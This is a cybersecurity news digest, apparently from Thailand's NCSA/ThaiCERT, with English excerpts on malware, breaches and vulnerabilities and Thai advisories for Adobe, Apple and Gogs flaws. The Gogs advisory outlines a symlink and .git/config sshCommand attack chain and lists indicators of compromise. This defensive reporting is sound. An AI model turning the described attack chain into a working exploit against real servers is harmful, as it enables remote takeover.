"The Socket Threat Research Team uncovered a malicious NuGet package, Tracer.Fody.NLog, that typosquats and impersonates the legitimate Tracer.Fody library and its maintainer. It presents itself as a standard .NET tracing integration but in reality functions as a cryptocurrency wallet stealer. Inside the malicious package, the embedded Tracer.Fody.dll scans the default Stratis wallet directory, reads *.wallet.json files, extracts wallet data, and exfiltrates it together with the wallet password to threat actor-controlled infrastructure in Russia at 176[.]113[.]82[.]163."
https://socket.dev/blog/malicious-nuget-package-typosquats-popular-net-tracing-library
https://thehackernews.com/2025/12/rogue-nuget-package-poses-as-tracerfody.html - React2Shell Vulnerability Actively Exploited To Deploy Linux Backdoors
"The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security. "KSwapDoor is a professionally engineered remote access tool designed with stealth in mind," Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, said in a statement."
https://thehackernews.com/2025/12/react2shell-vulnerability-actively.html
https://unit42.paloaltonetworks.com/cve-2025-55182-react-and-cve-2025-66478-next/
https://jp.security.ntt/insights_resources/tech_blog/react2shell_malware_zndoor/
Breaches/Hacks/Leaks
- Cyberattack Disrupts Venezuelan Oil Giant PDVSA's Operations
"Petróleos de Venezuela (PDVSA), Venezuela's state-owned oil company, was hit by a cyberattack over the weekend that disrupted its export operations. In a Monday statement, PDVSA denied that the Saturday morning incident affected its operations in any way, adding that the breach was limited to some administrative systems. "Thanks to the expertise of PDVSA's human talent, the operational areas were not affected in any way, with the attack being limited to its administrative system," the company said."
https://www.bleepingcomputer.com/news/security/cyberattack-disrupts-venezuelan-oil-giant-pdvsas-operations/
https://therecord.media/venezuela-state-oil-company-blames-cyberattack-on-us
https://www.darkreading.com/cyber-risk/venezuela-oil-company-downplays-alleged-us-cyberattack
https://securityaffairs.com/185755/security/a-cyber-attack-hit-petroleos-de-venezuela-pdvsa-disrupting-export-operations.html
General News
- AI Might Be The Answer For Better Phishing Resilience
"Phishing is still a go-to tactic for attackers, which is why even small gains in user training are worth noticing. A recent research project from the University of Bari looked at whether LLMs can produce training that helps people spot suspicious emails with better accuracy. The research team ran two controlled studies with a total of 480 participants. Both studies used content generated by an LLM to deliver phishing awareness lessons."
https://www.helpnetsecurity.com/2025/12/16/ai-generated-phishing-training-study/
https://arxiv.org/pdf/2512.01893 - Passwordless Is Finally Happening, And Users Barely Notice
"Security teams know the strain that comes from tightening authentication controls while keeping users productive. A new report from Okta suggests this strain is easing. Stronger authentication methods are gaining traction, and many of them let users move through sign in flows with less effort than before. The report indicates that the long held belief that better security slows people down is becoming less relevant as these methods improve both protection and usability."
https://www.helpnetsecurity.com/2025/12/16/okta-mfa-security-shift-report/ - Fraudulent Call Centres In Ukraine Rolled Up
"Authorities from the Czech Republic, Latvia, Lithuania and Ukraine with the support of Eurojust took action against a criminal network operating call centres in Dnipro, Ivano-Frankivsk and Kyiv, Ukraine that scammed victims across Europe. The criminal group established a professional organisation with employees who received a percentage of the proceeds for each completed scam. The estimated damage to more than 400 known victims is over EUR 10 million. The fraudsters used various scams, such as posing as police officers to withdraw money using their victims’ cards and details, or pretending that their victims’ bank accounts had been hacked."
https://www.eurojust.europa.eu/news/fraudulent-call-centres-ukraine-rolled
https://www.bleepingcomputer.com/news/security/european-authorities-dismantle-call-center-fraud-ring-in-ukraine/
https://www.helpnetsecurity.com/2025/12/16/ukraine-scam-call-centers/ - Common Holiday Phishing Threats And How To Recognize Them
"The holiday season brings a flurry of online shopping, travel plans, and end-of-year workplace activity. With that, it also brings a surge of phishing scams that try to take advantage of all that hustle and distraction. With inboxes filling up faster than gift lists, it becomes easier for a convincing message to slip through. The United States FBI notes that holiday scams often involve criminals posing as trusted companies or contacts in order to steal personal information, credentials, or money. This includes emails or messages that encourage victims to click links, provide sensitive data, or download malware."
https://cofense.com/blog/common-holiday-phishing-threats-and-how-to-recognize-them - Enterprises Gear Up For 2026’s IT Transformation
"An IT infrastructure refresh is set for 2026, and while strategies will mainly focus on artificial intelligence (AI), the cloud will also play a pivotal role. First there was COVID, which forced enterprises to adopt more hybrid approaches to the workday. More recently, the industry experienced a shift that put AI front and center. Both of those factors – which ignited the need for better data, access, and security controls - will influence how organizations think about their infrastructure for the coming year."
https://www.darkreading.com/cybersecurity-operations/enterprises-gear-up-for-2026-s-it-transformation - Link11 Identifies Five Cybersecurity Trends Set To Shape European Defense Strategies In 2026
"Link11, a European provider of web infrastructure security solutions, has released new insights outlining five key cybersecurity developments expected to influence how organizations across Europe prepare for and respond to threats in 2026. The findings are based on analysis of current threat activity, industry research, and insights from the Link11 European Cyber Report, alongside broader market indicators such as PwC’s Global Digital Trust Insights 2026."
https://hackread.com/link11-identifies-five-cybersecurity-trends-set-to-shape-european-defense-strategies-in-2026/ - Android Mobile Adware Surges In Second Half Of 2025
"Android users spent 2025 walking a tighter rope than ever, with malware, data‑stealing apps, and SMS‑borne scams all climbing sharply while attackers refined their business models around mobile data and access. Looking back, we may view 2025 as the year when one-off scams were replaced on the score charts by coordinated, well-structured, attack frameworks. Comparing two equal six‑month periods—December 2024 through May 2025 versus June through November 2025—our data shows Android adware detections nearly doubled (90% increase), while PUP detections increased by roughly two‑thirds and malware detections by about 20%."
https://www.malwarebytes.com/blog/mobile/2025/12/android-threats-in-2025-when-your-phone-becomes-the-main-attack-surface - Where Cloud Security Stands Today And Where AI Breaks It
"Every year, the cloud is becoming more distributed, automated and tightly wired into the business. Every day, adversaries compress the timeline between compromise and data exfiltration. What once took them 44 days now takes minutes. For the fifth year in a row, Palo Alto Networks State of Cloud Security Report 2025 captures the changes both big and small that security leaders are navigating in the market today. Our report reveals that the rapid adoption of enterprise AI is fueling an unprecedented surge in cloud security risks, driving a massive expansion of the attack surface. We found that 99% of organizations experienced at least one attack on their AI systems within the past year, and the acceleration of GenAI-assisted coding is outstripping security teams' capacity to keep pace. What’s missing isn't just visibility, it’s alignment."
https://www.paloaltonetworks.com/blog/2025/12/cloud-security-2025-report-insights/ - From Open Source To OpenAI: The Evolution Of Third-Party Risk
"The Silicon Valley mantra to “move fast and break things” prioritizes growth over anything else. Unfortunately, this velocity extends to efficiently introducing vulnerabilities into the software supply chain. From open source software libraries to AI-enabled coding assistants, these tools enable rapid innovations, but they are also enabling attack vectors that threat actors are looking to exploit. Third-party risks have always been an issue, but they have not always been top of mind. For the past decade, ransomware dominated the headlines and mindshare of cybersecurity leaders."
https://www.securityweek.com/from-open-source-to-openai-the-evolution-of-third-party-risk/ - CISO Communities – Cybersecurity’s Secret Weapon
"The only defense better than the expertise of one CISO is the combined expertise of many CISOs. In recent years, closed CISO communities have increased in number and grown in size. They act as an information exchange, advice center, pressure valve, and safe haven from the critical oversight. The need is obvious. CISOs occupy a unique position in business. Despite greater integration with business operations, they remain the only business leaders trying to counter active and adaptive threats; and yet they remain a role that is little understood by the rest of the business. The only other leaders capable of discussing their needs, grouses, pressures and adversaries are other CISOs (although 1001 product vendors claim they understand and offer expensive solutions)."
https://www.securityweek.com/ciso-communities-cybersecuritys-secret-weapon/ - CAL, MITRE v18 & MITRE ATLAS: The Map I Wish I Had In The SOC
"I remember a Thursday night at a previous SOC position in FinTech. The alert queue spiked during a credential stuffing incident, and our team had to scramble to keep up with the influx of alerts. We had a SIEM, a SOAR, and a handful of open-source IOCs we continuously retrieved via Google and other search engines. Each analyst grabbed a ticket and went hunting alone, starting their own process from scratch. We could isolate hosts, block domains, and re-image servers, but it was difficult to see the whole picture as we sorted through mountains of data and noise. Speed was the metric that mattered. I knew we were missing critical patterns, but I couldn’t see them or communicate what I thought we might be missing. We were moving fast, but we were still relatively blind."
https://threatconnect.com/blog/cal-mitre-v18-mitre-atlas-the-map-i-wish-i-had-in-the-soc/ - Cyber Risk Management: Defenders Tell It Like It Is
"Every year, members of the Trend team pack their bags, blow up their neck pillows, and jet off to share cybersecurity insights with customers and industry leaders across the globe as part of our Trend World Tour. In 2024, we decided to make the event more of a two-way conversation by surveying cybersecurity professionals on the challenges they face and what matters to them. The result was our first-ever Trend Micro Defenders Survey Report, a data-driven account of frontline perspectives on key issues and emerging opportunities for cybersecurity professionals. It was so well received, we repeated the exercise in 2025, tripling the scope with more than 3,000 responses from 88 countries."
https://www.trendmicro.com/en_us/research/25/l/trend-micros-2025-defenders-survey-report.html
อ้างอิง
Electronic Transactions Development Agency (ETDA)
- The Messy Data Trails Of Telehealth Are Becoming a Security Nightmare
-
🚨ด่วน! แจ้งเตือนกรณี Adobe มีการอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรงในผลิตภัณฑ์ Adobe ColdFusion และ Adobe Experience Managerโพสต์ใน Cyber Security News
ThaiCERT ได้ติดตามสถานการณ์ภัยคุกคามทางไซเบอร์อย่างใกล้ชิด และพบว่า Adobe ได้ออกอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรงหลายรายการ ซึ่งส่งผลกระทบต่อผลิตภัณฑ์ที่มีการใช้งานอย่างแพร่หลายในหน่วยงานภาครัฐ ภาคเอกชน และองค์กรขนาดใหญ่ หากยังคงใช้งานเวอร์ชันที่ได้รับผลกระทบโดยไม่ทำการแก้ไข อาจเปิดโอกาสให้ผู้ไม่หวังดีใช้เป็นช่องทางโจมตีระบบ และควบคุมเซิร์ฟเวอร์จากระยะไกลได้
รายละเอียดช่องโหว่ที่สำคัญAdobe ColdFusion
• CVE-2025-61809 (CVSS 9.8)
เป็นช่องโหว่ด้านการตรวจสอบข้อมูลนำเข้าที่ไม่เหมาะสม (Improper Input Validation) ผู้โจมตีสามารถส่งข้อมูลที่ถูกปรับแต่งเป็นพิเศษ (Malicious Input) เพื่อหลีกเลี่ยงมาตรการความปลอดภัย และเข้าถึง อ่าน หรือเขียนข้อมูลภายในระบบได้ ซึ่งอาจนำไปสู่การโจมตีแบบ Remote Code Execution (RCE)
• CVE-2025-61808 (CVSS 9.1)
เป็นช่องโหว่ที่เกี่ยวข้องกับกระบวนการอัปโหลดไฟล์ ซึ่งผู้โจมตีที่มีสิทธิ์ระดับสูงสามารถอาศัยช่องโหว่นี้เพื่ออัปโหลดไฟล์อันตราย และนำไปสู่การเรียกใช้โค้ดโดยไม่ได้รับอนุญาต
Adobe Experience Manager (AEM)
• CVE-2025-64537 และ CVE-2025-64539 (CVSS 9.3)
เป็นช่องโหว่ประเภท DOM-based Cross-Site Scripting (XSS) หากถูกโจมตีสำเร็จ ผู้ไม่หวังดีสามารถแทรกสคริปต์อันตรายลงในเว็บแอปพลิเคชัน และหลอกให้ผู้ใช้งานเรียกใช้งานโค้ดดังกล่าว ส่งผลให้ข้อมูลผู้ใช้งานถูกขโมย หรือถูกนำไปใช้โจมตีได้
ผลิตภัณฑ์และเวอร์ชันที่ได้รับผลกระทบ
Adobe ColdFusion
• ColdFusion 2021 – Update 22 และเวอร์ชันก่อนหน้า
• ColdFusion 2023 – Update 16 และเวอร์ชันก่อนหน้า
• ColdFusion 2025 – Update 4 และเวอร์ชันก่อนหน้า
Adobe Experience Manager (AEM)
• AEM Cloud Service (CS)
• AEM 6.5 LTS
• AEM 6.5.23 และเวอร์ชันก่อนหน้า
แนวทางการตรวจสอบและการป้องกัน- ผู้ดูแลระบบควรตรวจสอบเวอร์ชันของ Adobe ColdFusion และ Adobe Experience Manager (AEM) ที่ใช้งานอยู่ในปัจจุบัน เพื่อประเมินว่าระบบเข้าข่ายได้รับผลกระทบจากช่องโหว่หรือไม่ โดยให้ความสำคัญกับระบบที่เปิดให้บริการผ่านเครือข่ายอินเทอร์เน็ต
- แนะนำให้ดำเนินการอัปเดตเป็นเวอร์ชันล่าสุดตามคำแนะนำของ Adobe โดยเร็วที่สุด เนื่องจากเป็นแนวทางการแก้ไขที่มีประสิทธิภาพสูงสุด และสามารถขจัดความเสี่ยงจากช่องโหว่ได้อย่างถาวร
กรณียังไม่สามารถอัปเดตได้ทันที ดำเนินการดังนี้
- ใช้มาตรการป้องกันผ่าน Web Application Firewall เพื่อช่วยตรวจจับและบล็อกคำขอที่มีพฤติกรรมผิดปกติ โดยเฉพาะคำขอที่เกี่ยวข้องกับการอัปโหลดไฟล์ต้องสงสัย การโจมตีแบบ Remote Code Execution และ Cross-Site Scripting
- ตรวจสอบ Log ของ Web Server, Application Server รวมถึง ColdFusion และ AEM เพื่อค้นหาพฤติกรรมที่อาจบ่งชี้ถึงการโจมตีหรือการพยายามเข้าถึงระบบโดยไม่ได้รับอนุญาต
- พิจารณาปิดหรือจำกัดฟังก์ชันที่ไม่จำเป็นต่อการให้บริการ เช่น ฟังก์ชันอัปโหลดไฟล์ หรือ Module และ Plugin ที่ไม่ได้ใช้งาน พร้อมทั้งตรวจสอบและลดสิทธิ์ของบัญชีผู้ใช้งานให้เป็นไปตามหลัก Least Privilege
- ผู้ดูแลระบบควรสำรองข้อมูลระบบและข้อมูลสำคัญอย่างสม่ำเสมอ และเตรียมแผนการตอบสนองเหตุการณ์ เพื่อให้สามารถดำเนินการได้อย่างรวดเร็ว หากตรวจพบการโจมตีหรือเหตุผิดปกติ
สำหรับผู้ใช้งานทั่วไป
ผู้ใช้งานระบบภายในองค์กรควรหลีกเลี่ยงการคลิกลิงก์หรือเปิดไฟล์จากแหล่งที่ไม่ทราบที่มา และแจ้งผู้ดูแลระบบทันที หากพบพฤติกรรมระบบผิดปกติ เช่น ระบบทำงานช้าลง หรือมีข้อความแจ้งเตือนที่ไม่คุ้นเคย
ที่มา:
1.https://csa.gov.sg/alerts-and-advisories/alerts/al-2025-119/
2.https://nvd.nist.gov/vuln/detail/CVE-2025-61808
3.https://nvd.nist.gov/vuln/detail/CVE-2025-61809
4.https://nvd.nist.gov/vuln/detail/CVE-2025-64537
5.https://nvd.nist.gov/vuln/detail/CVE-2025-64539
ด้วยความปรารถนาดี
สำนักงานคณะกรรมการการรักษาความมั่นคงปลอดภัยไซเบอร์แห่งชาติ (สกมช.) / ThaiCERT#AdobePatch
#ColdFusion
#AEM
#CVE2025
#CyberSecurity
#ThaiCERT
#ช่องโหว่Adobe
-
Apple ออกอัปเดตฉุกเฉินอุดช่องโหว่ Zero-Day 2 รายการบน WebKit ถูกใช้โจมตีจริงแล้วโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
CERT-FR แนะนำผู้ใช้ iPhone และ Android ปิด Wi-Fi ทุกครั้งเมื่อไม่ใช้งาน เพื่อลดความเสี่ยงด้านความมั่นคงปลอดภัยโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
เตือนภัย! มิจฉาชีพใช้ช่องโหว่ฟีเจอร์ "Subscriptions" ของ PayPal ส่งอีเมล Phishing จากโดเมนจริงโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
🚨ด่วน!!ช่องโหว่ ใน Apple อัปเดตทันทีโพสต์ใน Cyber Security News
ThaiCERT แจ้งเตือนกรณีพบการโจมตีจริงโดยใช้ช่องโหว่ 2 รายการของ Apple มีความเสี่ยงที่จะถูกยึดหรือควบคุมอุปกรณ์ แนะนำอัปเดตเป็น iOS/iPadOS 26.2, macOS Tahoe 26.2 หรือเวอร์ชันล่าสุดอื่น ๆ ที่เกี่ยวข้องทันที
️รายละเอียดของช่องโหว่
•CVE-2025-43529 เป็นช่องโหว่ประเภท Use-after-free ใน WebKit ที่อาจทำให้ผู้โจมตีสามารถรันโค้ดจากระยะไกล (Remote Code Execution) ได้
เมื่อผู้ใช้เปิดเว็บที่ถูกออกแบบมาเป็นพิเศษ
•CVE-2025-14174 เป็นช่องโหว่ Memory Corruption ซึ่งอาจทำให้เกิดการจัดการหน่วยความจำผิดพลาด ผ่านการประมวลผลเนื้อหาเว็บที่เป็นอันตราย
อุปกรณ์ที่ได้รับผลกระทบและเวอร์ชันที่ได้รับการแก้ไขอุปกรณ์ที่ได้รับผลกระทบ
-iPhone 11 และรุ่นที่ใหม่กว่า
-iPad Pro ขนาด 12.9 นิ้ว (รุ่นที่ 3 และรุ่นที่ใหม่กว่า)
-iPad Pro 11 นิ้ว (รุ่นที่ 1 และรุ่นต่อๆ มา)
-iPad Air (รุ่นที่ 3 และรุ่นที่ใหม่กว่า)
-iPad (รุ่นที่ 8 ขึ้นไป)
-iPad mini (รุ่นที่ 5 ขึ้นไป)Apple ได้เผยแพร่อัปเดตด้านความมั่นคงปลอดภัยเพื่อแก้ไขช่องโหว่ในผลิตภัณฑ์ โดยเวอร์ชันที่ได้รับการแก้ไขดังนี้
-iOS 26.2 และ iPadOS 26.2
-iOS 18.7.3 และ iPadOS 18.7.3
-macOS Tahoe 26.2
-tvOS 26.2
-watchOS 26.2
-visionOS 26.2
-Safari 26.2 สำหรับ macOS Sonoma และ macOS Sequoia
️แนวทางการป้องกันและลดความเสี่ยง
· อัปเดตระบบปฏิบัติการและ Safari ให้เป็นเวอร์ชันล่าสุดโดยทันที
· เฝ้าระวังการใช้งานที่ผิดปกติของอุปกรณ์ โดยเฉพาะการเข้าชมเว็บไซต์การเชื่อมต่อเครือข่าย
และการทำงานของเบราว์เซอร์
· สำหรับองค์กรให้บังคับใช้นโยบายการอัปเดตแพตช์ ครอบคลุมอุปกรณ์ผู้ใช้งานทั้งหมดภายใต้
การดูแล และไม่ควรอนุญาตให้เลื่อนการติดตั้งแพตช์ด้านความมั่นคงปลอดภัย
รีบอัปเดตซอฟต์แวร์ทุกอุปกรณ์ Apple อย่าช้า! เพื่อความปลอดภัยของท่านด้วยความปรารถนาดี
สำนักงานคณะกรรมการการรักษาความมั่นคงปลอดภัยไซเบอร์แห่งชาติ (สกมช.) / ThaiCERT ที่มา
1.https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-117/
2.https://nvd.nist.gov/vuln/detail/CVE-2025-14174
3.https://support.apple.com/en-us/100100
4.https://coesecurity.com/apple-patches-two-webkit-zero-days-actively-exploited-in-sophisticated-attacks/
-
เตือนภัยเร่งด่วน! พบช่องโหว่ ร้ายแรง (CVE-2025-8110) ใน Gogs แฮกเกอร์กำลังโจมตีหนัก เสี่ยงถูกยึดเซิร์ฟเวอร์ทันทีโพสต์ใน Cyber Security News
รายงานสถานการณ์ความปลอดภัยไซเบอร์: พบการโจมตีระลอกใหม่พุ่งเป้าไปที่ระบบ Gogs (Self-hosted Git Service ยอดนิยม) ผ่านช่องโหว่ระดับวิกฤตที่ยังไม่มีแพตช์แก้ไขสมบูรณ์ ส่งผลให้เซิร์ฟเวอร์กว่า 700 แห่งทั่วโลกถูกเจาะระบบแล้ว ผู้ดูแลระบบต้องรีบดำเนินการป้องกันทันที
สรุปสถานการณ์ (Executive Summary)
• CVE ID: CVE-2025-8110
• ความรุนแรง (CVSS): 8.7 (High) - Critical
• สถานะ: Active Exploitation (มีการโจมตีจริงอย่างแพร่หลาย)
• ผลกระทบ: ผู้โจมตีสามารถรันโค้ดจากระยะไกล (RCE) และยึดครองเครื่องเซิร์ฟเวอร์ได้เบ็ดเสร็จ
• สาเหตุ: การจัดการไฟล์ Symbolic Link ที่ไม่ปลอดภัยใน API ทำให้เกิดช่องโหว่ Path Traversal
รายละเอียดทางเทคนิค: เมื่อ "แพตช์เก่า" เอาไม่อยู่
ช่องโหว่นี้ถือเป็น Bypass Vulnerability หรือการหลบเลี่ยงมาตรการป้องกันเดิม โดยก่อนหน้านี้ Gogs ได้พยายามแก้ไขช่องโหว่ CVE-2024-55947 เพื่อป้องกันการเข้าถึงไฟล์ข้าม Directory แล้ว แต่การตรวจสอบดังกล่าวยังมีจุดอ่อนที่ "ไม่ได้ตรวจสอบ Symbolic Links (Symlinks) อย่างถูกต้อง"
กระบวนการโจมตี (Attack Chain):- Infiltration: ผู้โจมตีสมัครสมาชิกเข้ามาสร้าง Repository ใหม่ (มักทำผ่านระบบ Open Registration ที่เปิดสาธารณะ)
- Preparation: ทำการ Commit ไฟล์ที่เป็น Symlink ซึ่งชี้เป้าไปยังไฟล์สำคัญของระบบ (เช่น ไฟล์ Config)
- Execution: เรียกใช้ PutContents API เพื่อเขียนข้อมูลลงใน Symlink นั้น ระบบของ Gogs จะตรวจสอบแค่ชื่อไฟล์ใน Repo (ซึ่งดูปกติ) แต่เมื่อระบบปฏิบัติการเขียนไฟล์จริง จะเขียนทะลุไปยังปลายทางที่ Symlink ชี้ไว้
- Takeover: ผู้โจมตีมักเลือกเขียนทับไฟล์ .git/config ในส่วน sshCommand เพื่อสั่งให้เซิร์ฟเวอร์รันคำสั่งอันตราย จนนำไปสู่การยึดเครื่อง (RCE)
ความเสียหายที่ตรวจพบ (Impact & Indicators)
จากการตรวจสอบเซิร์ฟเวอร์ที่ตกเป็นเหยื่อ พบพฤติกรรมของกลุ่มแฮกเกอร์ดังนี้:
• การฝังมัลแวร์: มีการติดตั้งมัลแวร์ Supershell (C2 Framework) โดยซ่อนตัวผ่านเทคนิค Obfuscation และบีบอัดด้วย UPX
• การเชื่อมต่อภายนอก: เครื่องเหยื่อจะสร้าง Reverse SSH Shell เชื่อมต่อกลับไปยัง C2 Server ของแฮกเกอร์ เพื่อรอรับคำสั่งควบคุม
สัญญาณบ่งชี้ว่าคุณอาจถูกโจมตี (IoCs - Indicators of Compromise):- Repository แปลกปลอม: มี Repo ชื่อเป็นตัวอักษรภาษาอังกฤษสุ่ม 8 ตัว (เช่น IV79VAew, Km4zoh4s) ที่ถูกสร้างขึ้นช่วง ก.ค. 2025 เป็นต้นมา
- Traffic ต้องสงสัย: ตรวจสอบ Firewall Log พบการเชื่อมต่อออกไปยัง IP: 119.45.176[.]196
- ไฟล์ Config ผิดปกติ: ไฟล์ .git/config มีบรรทัด sshCommand แทรกเข้ามา
คำแนะนำและวิธีแก้ไขด่วน (Mitigation)
เนื่องจาก ณ ปัจจุบัน (ธ.ค. 2025) ยังไม่มีแพตช์ Official ที่สมบูรณ์ ผู้ดูแลระบบ ต้อง ดำเนินการดังนี้ทันที:- ปิดประตูบ้าน (มาตรการเร่งด่วนที่สุด)
• Disable Open Registration: ปิดระบบให้คนทั่วไปสมัครสมาชิกได้เองทันที เพื่อตัดวงจรการสร้าง User มาโจมตี
o วิธีทำ: แก้ไขไฟล์ custom/conf/app.ini ตั้งค่า ENABLE_REGISTRATION = false หรือ DISABLE_REGISTRATION = true
• จำกัดการเข้าถึง (Network Segmentation): ห้ามนำ Gogs ต่อตรงกับอินเทอร์เน็ตสาธารณะ ควรใช้งานผ่าน VPN หรือกำหนด IP Allow-list เท่านั้น - เปลี่ยนระบบยืนยันตัวตน
• หากจำเป็นต้องใช้งานหลายคน ให้เปลี่ยนไปใช้ SSO หรือ LDAP แทนการให้สมัครเอง - การเฝ้าระวัง
• หมั่นตรวจสอบ GitHub Release ของ Gogs เพื่อรออัปเดตเวอร์ชันใหม่กว่า 0.13.3 ทันทีที่ออกมา
• หากต้องการความปลอดภัยสูง อาจพิจารณาเปลี่ยนไปใช้ Gitea ซึ่งเป็น Fork ที่มีการอัปเดตความปลอดภัยสม่ำเสมอกว่า
ด้วยความปรารถนาดี
สำนักงานคณะกรรมการการรักษาความมั่นคงปลอดภัยไซเบอร์แห่งชาติ (สกมช.) / ThaiCERT ที่มา
https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
-
Cyber Threat Intelligence 16 December 2025โพสต์ใน Cyber Security News
New Tooling
- Prometheus: Open-Source Metrics And Monitoring Systems And Services
"Prometheus is an open-source monitoring and alerting system built for environments where services change often and failures can spread fast. For security teams and DevOps engineers, it has become a common way to track system behavior, spot early warning signs, and understand what is happening across large sets of workloads."
https://www.helpnetsecurity.com/2025/12/15/prometheus-open-source-metrics-monitoring-systems-services/
https://github.com/prometheus/prometheus
Vulnerabilities
- Atlassian Patches Critical Apache Tika Flaw
"Atlassian has rolled out patches for roughly 30 third-party vulnerabilities impacting its products, including critical-severity flaws. The first security defect that stands out is CVE-2025-66516 (CVSS score of 10/10), a critical-severity XML External Entity (XXE) injection bug in Apache Tika. Impacting the tika-core, tika-pdf-module, and tika-parsers modules of the universal parser, the flaw was disclosed in early December. It can be exploited via crafted XFA files placed inside PDF files, potentially leading to information leaks, denial-of-service (DoS), SSRF attacks, or remote code execution (RCE)."
https://www.securityweek.com/atlassian-patches-critical-apache-tika-flaw/
https://securityaffairs.com/185710/security/atlassian-fixed-maximum-severity-flaw-cve-2025-66516-in-apache-tika.html - FreePBX Patches Critical SQLi, File-Upload, And AUTHTYPE Bypass Flaws Enabling RCE
"Multiple security vulnerabilities have been disclosed in the open-source private branch exchange (PBX) platform FreePBX, including a critical flaw that could result in an authentication bypass under certain configurations. The shortcomings, discovered by Horizon3.ai and reported to the project maintainers on September 15, 2025, are listed below -"
https://thehackernews.com/2025/12/freepbx-authentication-bypass-exposed.html - CISA Adds Two Known Exploited Vulnerabilities To Catalog
"CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-14611 Gladinet CentreStack and Triofox Hard Coded Cryptographic Vulnerability
CVE-2025-43529 Apple Multiple Products Use-After-Free WebKit Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/12/15/cisa-adds-two-known-exploited-vulnerabilities-catalog
https://securityaffairs.com/185716/hacking/u-s-cisa-adds-apple-and-gladinet-centrestack-and-triofox-flaws-to-its-known-exploited-vulnerabilities-catalog.html
Malware
- Frogblight Threatens You With a Court Case: a New Android Banker Targets Turkish Users
"In August 2025, we discovered a campaign targeting individuals in Turkey with a new Android banking Trojan we dubbed “Frogblight”. Initially, the malware was disguised as an app for accessing court case files via an official government webpage. Later, more universal disguises appeared, such as the Chrome browser. Frogblight can use official government websites as an intermediary step to steal banking credentials. Moreover, it has spyware functionality, such as capabilities to collect SMS messages, a list of installed apps on the device and device filesystem information. It can also send arbitrary SMS messages."
https://securelist.com/frogblight-banker/118440/ - Threats Behind The Mask Of Gentlemen Ransomware
"Gentlemen is a new ransomware group first identified around August 2025. The group operates a double extortion model that involves breaching corporate networks, exfiltrating data, encrypting the data, and then using the encrypted data to extort victims. During the breach, the group employs typical tactics seen in advanced ransomware groups, such as Group Policy Objects (GPO) manipulation and Bring Your Own Vulnerable Driver (BYOVD). As of now, there is no clear evidence that the group is operating on a Ransomware as a Service (RaaS) model. Additionally, it is yet to be confirmed whether the group is a rebranding of an existing ransomware group or a sub-group."
https://asec.ahnlab.com/en/91545/ - SantaStealer Is Coming To Town: A New, Ambitious Infostealer Advertised On Underground Forums
"Rapid7 Labs has identified a new malware-as-a-service information stealer being actively promoted through Telegram channels and on underground hacker forums. The stealer is advertised under the name “SantaStealer” and is planned to be released before the end of 2025. Open source intelligence suggests that it recently underwent a rebranding from the name “BluelineStealer.” The malware collects and exfiltrates sensitive documents, credentials, wallets, and data from a broad range of applications, and aims to operate entirely in-memory to avoid file-based detection. Stolen data is then compressed, split into 10 MB chunks, and sent to a C2 server over unencrypted HTTP."
https://www.rapid7.com/blog/post/tr-santastealer-is-coming-to-town-a-new-ambitious-infostealer-advertised-on-underground-forums/
https://www.bleepingcomputer.com/news/security/new-santastealer-malware-steals-data-from-browsers-crypto-wallets/ - Askul Confirms Theft Of 740k Customer Records In Ransomware Attack
"Japanese e-commerce giant Askul Corporation has confirmed that RansomHouse hackers stole around 740,000 customer records in the ransomware attack it suffered in October. Askul is a large business-to-business and business-to-consumer office supplies and logistics e-commerce company owned by Yahoo! Japan Corporation. The ransomware incident in October caused an IT system failure, forcing the company to suspend shipments to customers, including the retail giant Muji."
https://www.bleepingcomputer.com/news/security/askul-confirms-theft-of-740k-customer-records-in-ransomhouse-attack/ - Multiple Threat Actors Exploit React2Shell (CVE-2025-55182)
"On Dec. 3, 2025, a critical unauthenticated remote code execution (RCE) vulnerability in React Server Components, tracked as CVE-2025-55182 (aka "React2Shell"), was publicly disclosed. Shortly after disclosure, Google Threat Intelligence Group (GTIG) had begun observing widespread exploitation across many threat clusters, ranging from opportunistic cyber crime actors to suspected espionage groups. GTIG has identified distinct campaigns leveraging this vulnerability to deploy a MINOCAT tunneler, SNOWLIGHT downloader, HISONIC backdoor, and COMPOOD backdoor, as well as XMRIG cryptocurrency miners, some of which overlaps with activity previously reported by Huntress."
https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182/
https://www.bleepingcomputer.com/news/security/google-links-more-chinese-hacking-groups-to-react2shell-attacks/
https://www.bankinfosecurity.com/nation-state-cybercrime-exploits-tied-to-react2shell-a-30285
https://www.securityweek.com/google-sees-5-chinese-groups-exploiting-react2shell-for-malware-delivery/
https://www.theregister.com/2025/12/15/react2shell_flaw_china_iran/ - GitHub Scanner For React2Shell (CVE-2025-55182) Turns Out To Be Malware
"A GitHub repository posing as a vulnerability scanner for CVE-2025-55182, also referred to as “React2Shell,” was exposed as malicious after spreading malware. The project, named React2shell-scanner, was hosted under the user niha0wa and has since been removed from the platform following community reports. Saurabh, a cybersecurity researcher, flagged the now-deleted tool on LinkedIn last week after identifying suspicious behaviour in the code. According to his post, the script included a hidden payload designed to execute mshta.exe and fetch a remote file from py-installer.cc, a known technique used to drop second-stage malware."
https://hackread.com/github-scanner-react2shell-cve-2025-55182-malware/ - Operation MoneyMount-ISO — Deploying Phantom Stealer Via ISO-Mounted Executables
"At Seqrite Labs, we continuously monitor global cyber threat activity. During ongoing threat monitoring, the Seqrite Labs Researcher Team identified an active phishing campaign originating from Russia. This campaign employs a fake payment confirmation lure to deliver the Phantom information-stealing malware through a multi-stage attachment chain. The attack initiates with a social engineering email masquerading as a legitimate financial correspondence, claiming to confirm a payment transaction. The email contains a malicious ZIP archive, which, when opened, triggers the execution of the payload."
